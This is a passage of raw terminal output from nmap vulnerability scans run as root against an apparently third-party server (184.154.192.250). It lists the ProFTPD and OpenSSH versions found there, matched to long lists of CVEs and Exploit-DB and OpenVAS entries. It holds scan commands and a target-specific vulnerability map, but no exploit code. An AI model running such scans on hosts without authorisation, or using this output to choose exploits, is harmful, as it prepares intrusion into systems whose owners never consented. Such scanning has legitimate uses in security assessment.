  1688. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
  1689. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
  1690. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
  1691. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  1692. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  1693. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  1694. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  1695. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  1696. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  1697. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  1698. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  1699. |
  1700. | OpenVAS (Nessus) - http://www.openvas.org:
  1701. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1702. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  1703. |
  1704. | SecurityTracker - https://www.securitytracker.com:
  1705. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  1706. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  1707. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  1708. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  1709. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  1710. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  1711. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  1712. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  1713. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  1714. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  1715. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  1716. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  1717. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  1718. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  1719. |
  1720. | OSVDB - http://www.osvdb.org:
  1721. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  1722. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  1723. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  1724. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  1725. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  1726. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  1727. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  1728. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  1729. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  1730. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  1731. | [57310] ProFTPD Multiple Unspecified Overflows
  1732. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  1733. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  1734. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  1735. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  1736. | [57305] ProFTPD src/main.c Unspecified Overflow
  1737. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  1738. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  1739. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  1740. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  1741. | [51849] ProFTPD Character Encoding SQL Injection
  1742. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  1743. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  1744. | [48411] ProFTPD FTP Command Truncation CSRF
  1745. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  1746. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  1747. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  1748. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  1749. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  1750. | [23063] ProFTPD mod_radius Password Overflow DoS
  1751. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  1752. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  1753. | [18270] ProFTPD ftpshut Shutdown Message Format String
  1754. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  1755. | [10769] ProFTPD File Transfer Newline Character Overflow
  1756. | [10768] ProFTPD STAT Command Remote DoS
  1757. | [10758] ProFTPD Login Timing Account Name Enumeration
  1758. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  1759. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  1760. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  1761. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  1762. | [7165] ProFTPD USER Command Memory Leak DoS
  1763. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  1764. | [5705] ProFTPD Malformed cwd Command Format String
  1765. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  1766. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  1767. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  1768. |_
  1769. Service Info: OS: Unix
  1770.  
  1771. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1772. Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
  1773.  
  1774.  
  1775. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p22 184.154.192.250
  1776. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:28 CST
  1777. Nmap scan report for server.etours.cn (184.154.192.250)
  1778. Host is up (0.037s latency).
  1779.  
  1780. PORT STATE SERVICE VERSION
  1781. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1782. | vulscan: VulDB - https://vuldb.com:
  1783. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  1784. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  1785. | [43307] OpenSSH 4.0 unknown vulnerability
  1786. | [41835] OpenSSH up to 4.8 unknown vulnerability
  1787. | [38743] OpenSSH up to 4.6 unknown vulnerability
  1788. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  1789. | [32699] OpenBSD OpenSSH 4.1 denial of service
  1790. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  1791. |
  1792. | MITRE CVE - https://cve.mitre.org:
  1793. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  1794. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  1795. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  1796. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  1797. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  1798. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  1799. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  1800. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  1801. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  1802. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  1803. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  1804. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  1805. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  1806. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  1807. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  1808. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  1809. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  1810. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  1811. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  1812. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  1813. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  1814. |
  1815. | SecurityFocus - https://www.securityfocus.com/bid/:
  1816. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1817. |
  1818. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1819. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  1820. |
  1821. | Exploit-DB - https://www.exploit-db.com:
  1822. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  1823. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  1824. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  1825. |
  1826. | OpenVAS (Nessus) - http://www.openvas.org:
  1827. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  1828. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  1829. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  1830. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  1831. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  1832. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  1833. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  1834. | [861813] Fedora Update for openssh FEDORA-2010-5429
  1835. | [861319] Fedora Update for openssh FEDORA-2007-395
  1836. | [861170] Fedora Update for openssh FEDORA-2007-394
  1837. | [861012] Fedora Update for openssh FEDORA-2007-715
  1838. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  1839. | [840300] Ubuntu Update for openssh update USN-612-5
  1840. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  1841. | [840268] Ubuntu Update for openssh update USN-612-7
  1842. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  1843. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  1844. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  1845. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  1846. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  1847. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  1848. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  1849. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  1850. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  1851. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  1852. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  1853. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  1854. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  1855. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  1856. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  1857. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  1858. | [65987] SLES10: Security update for OpenSSH
  1859. | [65819] SLES10: Security update for OpenSSH
  1860. | [65514] SLES9: Security update for OpenSSH
  1861. | [65513] SLES9: Security update for OpenSSH
  1862. | [65334] SLES9: Security update for OpenSSH
  1863. | [65248] SLES9: Security update for OpenSSH
  1864. | [65218] SLES9: Security update for OpenSSH
  1865. | [65169] SLES9: Security update for openssh,openssh-askpass
  1866. | [65126] SLES9: Security update for OpenSSH
  1867. | [65019] SLES9: Security update for OpenSSH
  1868. | [65015] SLES9: Security update for OpenSSH
  1869. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  1870. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  1871. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  1872. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  1873. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  1874. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  1875. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  1876. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  1877. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  1878. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  1879. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  1880. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  1881. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  1882. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  1883. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  1884. | [57470] FreeBSD Ports: openssh
  1885. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  1886. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  1887. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  1888. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  1889. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  1890. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  1891. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  1892. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  1893. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  1894. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  1895. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  1896. | [10883] OpenSSH Channel Code Off by 1
  1897. | [10823] OpenSSH UseLogin Environment Variables
  1898. |
  1899. | SecurityTracker - https://www.securitytracker.com:
  1900. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  1901. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  1902. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  1903. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  1904. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  1905. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  1906. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  1907. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  1908. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  1909. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  1910. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  1911. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  1912. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  1913. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  1914. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  1915. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  1916. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  1917. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  1918. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  1919. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  1920. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  1921. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  1922. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  1923. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  1924. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  1925. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  1926. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  1927. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  1928. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  1929. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
  1930. | [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
  1931. | [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
  1932. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  1933. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  1934. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  1935. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  1936. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  1937. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  1938. |
  1939. | OSVDB - http://www.osvdb.org:
  1940. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  1941. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  1942. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  1943. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  1944. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  1945. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  1946. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  1947. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  1948. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  1949. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  1950. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  1951. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  1952. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  1953. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  1954. | [56921] OpenSSH Unspecified Remote Compromise
  1955. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  1956. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  1957. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  1958. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  1959. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  1960. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  1961. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  1962. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  1963. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  1964. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  1965. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  1966. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  1967. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  1968. | [34601] OPIE w/ OpenSSH Account Enumeration
  1969. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  1970. | [32721] OpenSSH Username Password Complexity Account Enumeration
  1971. | [30232] OpenSSH Privilege Separation Monitor Weakness
  1972. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  1973. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  1974. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  1975. | [29152] OpenSSH Identical Block Packet DoS
  1976. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  1977. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  1978. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  1979. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  1980. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  1981. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  1982. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  1983. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  1984. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  1985. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  1986. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  1987. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  1988. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  1989. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  1990. | [6072] OpenSSH PAM Conversation Function Stack Modification
  1991. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  1992. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  1993. | [5408] OpenSSH echo simulation Information Disclosure
  1994. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  1995. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  1996. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  1997. | [3456] OpenSSH buffer_append_space() Heap Corruption
  1998. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  1999. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  2000. | [2112] OpenSSH Reverse DNS Lookup Bypass
  2001. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  2002. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  2003. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  2004. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  2005. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2006. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2007. | [642] OpenSSH Multiple Key Type ACL Bypass
  2008. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2009. | [341] OpenSSH UseLogin Local Privilege Escalation
  2010. |_
  2011.  
  2012. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2013. Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds
  2014.  
  2015.  
  2016. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p21 184.154.192.250
  2017. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:29 CST
  2018. Nmap scan report for server.etours.cn (184.154.192.250)
  2019. Host is up (0.14s latency).
  2020.  
  2021. PORT STATE SERVICE VERSION
  2022. 21/tcp open ftp ProFTPD 1.3.3e
  2023. | vulscan: VulDB - https://vuldb.com:
  2024. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  2025. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  2026. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
  2027. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  2028. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  2029. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  2030. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  2031. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  2032. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  2033. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  2034. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  2035. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  2036. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  2037. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  2038. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  2039. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  2040. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
